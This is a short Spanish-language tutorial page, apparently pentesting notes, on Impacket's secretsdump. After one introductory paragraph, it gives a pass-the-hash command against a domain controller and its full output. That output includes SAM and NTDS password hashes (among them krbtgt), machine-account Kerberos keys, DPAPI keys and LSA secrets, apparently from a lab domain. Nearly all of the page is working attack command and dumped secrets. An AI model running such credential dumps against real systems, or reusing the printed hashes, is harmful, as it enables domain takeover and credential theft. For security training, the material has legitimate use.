Utilizando Impacket-secretsdump

Impacket-secretsdump es una herramienta muy utilizada en la seguridad informática y en pruebas de penetración que forma parte de la suite Impacket. Impacket es un conjunto de clases Python para trabajar con protocolos de red. secretsdump.py es un script dentro de esta colección que permite la extracción de hashes de contraseñas, tickets Kerberos y otros secretos del sistema de Windows. Es especialmente útil para la extracción de credenciales cuando se tiene acceso a un controlador de dominio de Windows.

kali@kali=> impacket-secretsdump -debug -dc-ip 3.14.245.175 admin@spartancybersec.corp -hashes :64fbae31cc352fc26af97cbdef151e03
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x6819873eadf71f0789285138af013772
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC 
SPARTANCYBERSEC\FIRST-DC$:aes256-cts-hmac-sha1-96:80e764f61ab3cb7fedc4fa0dcc2ae4346b9d86dce406bd0ef6dd171cf1a6b9e4
SPARTANCYBERSEC\FIRST-DC$:aes128-cts-hmac-sha1-96:e4a31fc1ad85640ff2b38263ab9a0bf4
SPARTANCYBERSEC\FIRST-DC$:des-cbc-md5:dc7acb5dd5832920
SPARTANCYBERSEC\FIRST-DC$:plain_password_hex:54ad56e5e0baa13e00c67a093b522c4fbf40c72dbc269b7274ba8c4e15e2c9bfd8f9fe3e476d6ceccc2ba2b22095003aa032b10d349836c8706574b11a003360a371082b6553f00aebce61c9d03b9e1db6433eed00c06bf7f6aecf6e998412fe8c6f5be2567cdfdab688d8342102c075e57e15a7d13732b6c9a974c9b29d47b9c7cb2958a9cdf18bcfff20329f953d0cbc32574dcf024c9c3307621dd56305d421b0c6d0e9e454d10bf079117e29cfe1b00037acec3bdeb2b73b1ee8282118346c13e03f93e051742bbebf21abd46920e48432c50f39d674328c767ebb417df8b37a0c61c1aaeafad9613b9621fe3d5c
SPARTANCYBERSEC\FIRST-DC$:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x982b8349b7df992ee7c56f20e44f5d151329b6c9
dpapi_userkey:0x3d4de8cb3f5353a1aad075f43682ed753d115a18
[+] Looking into NL$KM
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f
 0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..
 0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[
 0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_uAKYyEam
[+] Calling DRSCrackNames for S-1-5-21-1861162130-2580302541-221646211-500 
[+] Calling DRSGetNCChanges for {7c1a3d96-7ad9-44a1-a35f-3d06f3fec301} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::

Última actualización